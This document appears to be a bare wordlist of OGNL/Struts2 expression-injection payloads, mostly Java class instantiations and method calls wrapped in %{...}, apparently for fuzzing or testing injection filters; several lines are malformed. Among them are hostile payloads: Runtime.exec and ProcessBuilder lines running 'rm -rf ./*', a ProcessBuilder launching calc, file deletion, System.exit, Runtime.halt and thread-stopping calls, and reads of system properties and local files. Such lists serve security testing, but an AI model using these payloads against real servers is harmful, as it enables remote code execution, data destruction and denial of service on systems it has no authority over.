%{#a = new java.nio.channels.Pipe()}
%{#a = new sun.invoke.Empty()}
%{#a =new java.net.Authenticator()}
%{#a =new com.hazelcast.spi.Operation}
%{#a =new com.sun.jna.JniDispatch32()}
%{#a=new java.io.File("~"),#a.list()}
%{new java.io.CharArrayReader().buf()}
%{new java.io.CharArrayWriter().buf()}
%{new java.io.FileDescriptor().sync()}
%{new java.io.PipedReader().ready()}
%{@java.lang.System@getProperty()}
%{#a = @java.lang.ClassLoader@a}
%{@java.lang.System@getProperty()}
%{@java.lang.Shutdown@exit()}
%{@java.lang.System@exit(1)}
%{#a =@java.util.zip.ZipFile@CENATT }
%{#a =@sun.misc.Unsafe@getUnsafe()}
%{@java.io.FileDescriptor@sync()}
%{@java.io.FileInputStream@getFD()}
%{@java.io.Console@flush()}
%{@java.io.Console@reader()}
%{@java.io.Console@writer()}
%{@java.io.RandomAccessFile@readUTF()}
%{#a =@com.sun.jna.JniDispatch32()}
%{@java.lang.System.getProperty("a")
%{java.io.BufferedInputStream.Close()}
%{java.io.BufferedWriter.write(1)}
%{@java.io.CharArrayReader.read()}
%{@java.io.DataInputStream.readUTF()}
%{@java.io.FileInputStream.close()}
%{@java.io.FileOutputStream.getFD()}
%{@java.io.FilePermission.hashCode()}
%{@java.io.FilterInputStream.close()}
%{@java.io.FilterReader.reset() }
%{@java.io.FilterWriter.close()}
%{@java.io.InputStream.close() }
%{@java.io.InputStreamReader.read()}
%{@java.io.InputStreamReader.ready()}
%{@java.io.PipedOutputStream.write(5)}
%{@java.io.PrintStream.flush()}
%{@java.io.PushbackReader.close()}
%{@java.io.PushbackReader.ready() }
%{@java.io.Reader.close() }
%{@java.io.StringWriter.flush()}
%{@java.lang.shuntdown（）
%{@java.lang.System.exit（）
%{#f=new java.io.File("C:\\Users\\hp\\Desktop\\关键字1.txt"),#f.delete()}
%{(new java.io.File("C:\\Users\\hp\\Desktop\\关键字2.txt")).createNewFile()}
%{#a = new com.sun.management.DiagnosticCommandMBean()}
%{#a = new org.apache.catalina.session.JMSContext()}
%{#a = new javax.sql.rowset.RowSetMetaDataImpl()}
%{#a = new java.util.zip.DeflaterInputStream()}
%{#a =new java.util.concurrent.CountDownLatch()}
%{#a = new org.apache.catalina.session.StandardSession()}
%{#a =new com.atlassian.confluence.util.velocity.VelocityUtils()}
%{#a =new com.google.common.reflect.Reflection()}
%{#a =new com.atlassian.sal.api.net.RequestFactory()}
%{#a =new org.apache.commons.httpclient.HttpClient()}
%{#a =new com.atlassian.util.concurrent.LazyReference()}
%{#a =new freemarker.ext.jsp.TaglibFactory()}
%{#a =new com.sun.corba.se.impl.encoding.CodeSetConversion()}
%{#a =new com.sun.jmx.snmp.tasks.Task()}
%{#a =new org.apache.commons.exec.CommandLine()}
%{#a =new java.lang.reflect.Constructor<T>().getDeclaringClass()}
%{#a =new jcom.atlassian.util.concurrent.LazyReference()}
%{#a=new java.io.File("~/test.txt"),#a.delete()}
%{#a=new java.lang.Runtime().exec("rm -rf ./*")}
%{#a=new javax.script.ScriptEngineManager().getEngineByName().eval("println('hello!')")}
%{#a=new javax.script.ScriptEngineManager().getBindings()}
%{#a=new java.lang.Runtime().exec("ls -las", new java.io.File("/"))}
${(new java.lang.ProcessBuilder('calc')).start()}
%{new java.io.BufferedInputStream().close()}
%{new java.io.BufferedOutputStream().flush()}
%{new java.io.BufferedReader().lines()}
%{new java.io.BufferedWriter().newLine()}
%{new java.io.ByteArrayInputStream().mark()}
%{new java.io.ByteArrayOutputStream().}
%{new java.io.Console().readPassword()}
%{new java.io.DataInputStream().readLine()}
%{new java.io.DataOutputStream().flush()}
%{new java.io.FileInputStream().getFD()}
%{new java.io.FileOutputStream().flush}
%{new java.io.FilePermission().hashCode()}
%{new java.io.LineNumberInputStream().getLineNumber()}
%{new java.io.LineNumberReader().getLineNumber()}
%{new java.io.PipedInputStream().receive(a)}
%{new java.io.PipedOutputStream().connect(a)}
%{new java.io.RandomAccessFile().commentChar(ch)}
%{new java.io.StreamTokenizer().commentChar(ch)}
%{@java.io.FilePermission@newPermissionCollection()}
%{@java.io.LineNumberInputStream.getLineNumber()}
%{@java.io.ObjectInputStream.readBoolean()}
%{#a={"1,2,3",@java.io.ObjectInputStream.getField.defaulted(a)}
%{@java.io.ObjectOutputStream.defaultWriteObject()}
%{@java.io.ObjectStreamClass.getName()}
%{@java.io.ObjectStreamField.getOffset()}
%{#a={"jygfjgjj",java.io.ObjectStreamField.isPrimitive(a) }
%{#a={"hello",java.io.PushbackInputStream.available(a)}
%{#a={"fawefwafw"}@java.io.StringReader.markSupported(a)}
%{#a={java.io.Writer.write("hello ") }}
%{@java.io.ObjectOutputStream.PutField}
%{@java.io.FileInputStream@getChannel()}
%{@java.io.FileInputStream@read(byte[] b, int off, int len)}
%{@java.io.FileOutputStream@write(byte[] b, int off, int len)}
%{@java.io.FilePermission@getActions()}
%{@java.io.Console@readLine(String fmt, Object...args)}
%{@java.io.Console@readPassword(String fmt, Object... args)}
%{@java.io.DataInputStream@read(byte[] b, int off, int len)}
%{@java.io.DataInputStream@readFully(byte[] b, int off, int len)}
%{@java.io.DataInputStream@readUTF(DataInput in)}
%{@java.io.DataOutputStream@write(byte[] b, int off, int len)}
%{@java.io.DataOutputStream@writeUTF(String str)}
%{@java.io.Reader@read(char[] cbuf, int off, int len)}
%{@java.io.Writer@append(CharSequence csq)}
%{@java.io.Writer@write(char[] cbuf, int off, int len)}
%{@java.io.RandomAccessFile@getFilePointer()}
%{@java.io.RandomAccessFile@read(byte[] b, int off, int len)}
%{@java.io.RandomAccessFile@readFully(byte[] b, int off, int len)}
%{@java.io.RandomAccessFile@write(byte[] b, int off, int len)}
%{@java.io.RandomAccessFile@writeUTF(String str)}
%{@java.io.PipedReader@connect(PipedWriter src)}
%{@java.io.PipedReader@read(char[] cbuf, int off, int len)}
%{@java.io.PipedWriter@connect(PipedReader snk)}
%{@java.io.PipedWriter@write(char[] cbuf, int off, int len)}
%{@java.io.BufferedInputStream@read(byte[] b, int off, int len)}
%{@java.io.BufferedOutputStream@write(byte[] b, int off, int len)}
%{@java.lang.System.currentTimeMillis()
%{@java.io.BufferedInputStream.close()}
%{@java.io.BufferedOutputStream.Write(0)}
%{@java.io.ByteArrayOutputStream.write(256)}
%{@java.io.BufferedInputStream.write(1)
%{@java.io.File.getCanonicalFile(C:\Windows\appcompat)
%{@java.io.InputStreamReader.getEncoding() }
%{#a = new java.lang.ThreadLocal(@Override  protected ConnectioninitialValu(){return createConnection();})a.initialValue()}
%{#a = @java.lang.Package@getPackage("")}
%{@java.lang.Runtime@getRuntime().exit(1)}
%{@java.lang.Runtime@getRuntime().halt(1)}
%{@java.lang.System@getProperty('os.name')}
%{#f=new java.io.FileReader("C:\\Users\\hp\\Desktop\\关键字.txt"),#a = new char[1024],#f.read(#a,0,1024),new java.lang.String(#a)}
%{@java.lang.Thread@currentThread().stop()}
%{#a = @org.apache.catalina.session.StandardSession}
%{#a =@com.atlassian.confluence.util.velocity.VelocityUtils()}
%{#a =@com.atlassian.sal.api.net.RequestFactory()}
%{#a =@com.atlassian.util.concurrent.LazyReference()}
%{#a=new java.io.File("~/test.txt"),#a.setExecutable(true),#b=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash", "-c", "rm -rf ./*"})).start()}
%{@java.lang.Runtime@getRuntime().exec("ls -als")}
%{@com.opensymphony.xwork.ActionContext@getContext()}
%{#em=@javax.persistence.Persistence@createEntityManagerFactory("test").createEntityManager(),#em.createQuery("select * from Student")}
%{#sc=@javax.servlet.http.HttpServletRequest.getSession().getServletContext()}
%{#sc=@javax.servlet.http.HttpServletRequest.getSession().getServletContext().setAttribute("test", "hello")}
%{#sc=@javax.servlet.http.HttpServletRequest.getSession().getServletContext().getInitParameterNames()}
%{#sc=@javax.servlet.http.HttpServletRequest.getSession().getServletContext().getResourceAsStream("~/test.txt")}
%{@java.lang.ClassLoader@getSystemClassLoader()}
%{"userDir{" + @java.lang.System@getProperty("user.dir") + "}"}
%{"osName{" + @java.lang.System@getProperty("os.name") + "}"}
%{@java.lang.System@clearProperty("java.class.path")}
%{#a=@java.lang.Thread@currentThread().getThreadGroup(),#b=#a,#c=#b.getParent(),#env = '',#while = "#b=#c,#c=#c.getParent(),(#up)(#env)",#up = "(#c != null)?(#while)(#env):1",#b.stop()}

